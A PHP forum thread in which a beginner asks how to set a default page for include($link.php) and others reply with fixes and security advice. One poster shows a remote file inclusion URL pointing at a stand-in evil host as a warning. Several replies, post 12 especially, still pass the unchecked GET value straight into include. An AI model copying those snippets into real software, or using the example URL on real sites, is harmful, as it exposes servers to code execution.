SitePoint Sponsor

User Tag List

Results 1 to 14 of 14
  1. #1
    SitePoint Wizard
    Join Date
    Dec 2005
    Posts
    1,718
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    <?php include ("$link.php"); ?> {novice}

    hi all.

    just a basic question really, i have
    PHP Code:
    <?php include ("$link.php"); ?>
    included on my index, works fine when i link to it, example:
    PHP Code:
    index.php?link=news 
    problem is this is my index page and when it loads it just throws an error:

    Code:
    Warning: main(.php): failed to open stream: No such file or directory in /home/site/public_html/index.php on line 9
    
    Warning: main(.php): failed to open stream: No such file or directory
    how can i have content shown in this include from the start? more like a default until i link to it??

    if this mkes sense, thanks!!!

  2. #2
    SitePoint Wizard silver trophy Jelena's Avatar
    Join Date
    Feb 2005
    Location
    Universum, 3rd Corner
    Posts
    3,000
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    PHP Code:
    if(!isset($_GET["link"]))
    {
      
    $link "default";
    }
    else
    {
      
    $link $_GET["link"];
    }
    include(
    $link.".php"); 
    Also, even if $_GET["link"] is set, you should check if it's empty.
    -- Jelena --

  3. #3
    SitePoint Zealot krt's Avatar
    Join Date
    Sep 2005
    Location
    Australia
    Posts
    114
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    When accessing a GET variable (from the URL, eg. the 'link' variable in your case), use $_GET, you can also specify a default value:
    PHP Code:
    $link = isset($_GET['link']) ? $_GET['link'] : 'default'
    Note that you should never have a variable in an include statement when it is at the beginning as someone could request this:
    index.php?link=http://evil.example.com/hack.php?
    And then the attacker could execute any PHP code on your server, very bad security hole.
    Use a path before the variable or whitelist allowed 'links'.
    Eg:
    PHP Code:
    include "./$link.php"
    Even the above has its problems, eg. .htaccess files and .htpasswd functions could be accessed.

  4. #4
    SitePoint Wizard
    Join Date
    Dec 2005
    Posts
    1,718
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    i want to load some data from the start and then make it change once i click a link.

    so what ur saying here? can u just explain what the above is doing?

    if there is no data load the default? am i right?

    thanks

  5. #5
    SitePoint Wizard silver trophy Jelena's Avatar
    Join Date
    Feb 2005
    Location
    Universum, 3rd Corner
    Posts
    3,000
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    If there is no link variable defined, it will include file that is named default.php
    Therefore, you should have default.php which will have data you would like to include from the start.
    -- Jelena --

  6. #6
    SitePoint Wizard
    Join Date
    Dec 2005
    Posts
    1,718
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    great stuff!! got it working.

    PHP Code:
    <?php 
    $link 
    = isset($_GET['link']) ? $_GET['link'] : 'default'
    include (
    "./$link.php"); ?>
    so whats the problem with this regarding security? i added ./ to the $link, so how does this help?

    and now all my other links look like

    Code:
    http://mysite.com/index.php?link=news
    will this call me problems?

    thanks !!

  7. #7
    SitePoint Wizard
    Join Date
    Dec 2005
    Posts
    1,718
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Use a path before the variable or whitelist allowed 'links'.
    Eg:
    PHP Code:
    include "./$link.php"
    whats whitelist?

    Even the above has its problems, eg. .htaccess files and .htpasswd functions could be accessed.
    so how do u secure yourself against this?

    thanks!

  8. #8
    SitePoint Wizard
    Join Date
    Dec 2005
    Posts
    1,718
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    any1?

  9. #9
    SitePoint Enthusiast
    Join Date
    Nov 2005
    Posts
    52
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    i think its not a good idea to do this cuz if users types
    http://yoursite.com/index.php?link=blah~~~
    and that file doesnt exists you will get a error
    instead you can do it like:
    PHP Code:
    $page trim(addslashes($_GET['link']));
    if(
    $page == "news"){
    include 
    "news.php";
    }
    elseif(
    $page == "downloads"){
    include 
    "downlaoads.php";
    }
    elseif(
    $page == "whatever"){
    include 
    "whatever.php";
    }
    else{
    include 
    "main.php";

    so in the above case if users type index.php?link=nocase that wont match any of the cases so it will display the main page to the user instead of giving php errors

  10. #10
    SitePoint Wizard
    Join Date
    Dec 2005
    Posts
    1,718
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    yes that was my next question, i tryed put in false info

    Code:
    http://yoursite.com/index.php?link=blah~~~
    and it gave an error with all my directorys,

    and r u saying all the links i have to index.php?link= will need to be included in the code like u did above and if any other links try to run it will return to the default? main.php as u put.

    thanks

  11. #11
    SitePoint Enthusiast
    Join Date
    Nov 2005
    Posts
    52
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    in the above example if user post any false information he wont get a error the script will include the main page

  12. #12
    PHP Brainiac dg_den_golotyuk's Avatar
    Join Date
    Jul 2006
    Location
    Kiev, Ukraine
    Posts
    335
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Try this one:

    PHP Code:
    ...
    $link = ( $_GET['link'] ) ? $_GET['link'] : 'default.php' // default.php - is default for inclussion

    include("$link.php");
    ... 
    DG [Den Golotyuk], Lead Developer
    Chestnut Software
    Avoid web outsourcing scams!
    Click here
    for a free downloadable report

  13. #13
    SitePoint Zealot krt's Avatar
    Join Date
    Sep 2005
    Location
    Australia
    Posts
    114
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Whitelisting is listing all the allowed options (like in ak007's code)

    Prepending a path eg. ./ protects the code because it stops a potential hacker from using http://evil.example.com/hack.php? as the include path, now if someone tries this, it will try to include the invalid file: ./http://evil.example.com/hack.php?

  14. #14
    SitePoint Wizard
    Join Date
    Dec 2005
    Posts
    1,718
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    yes thanks all, ive used ak007s idea and works fine. thanks just means me adding a new line of code each time i add a new link to this include.

    CHEERS!!!


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •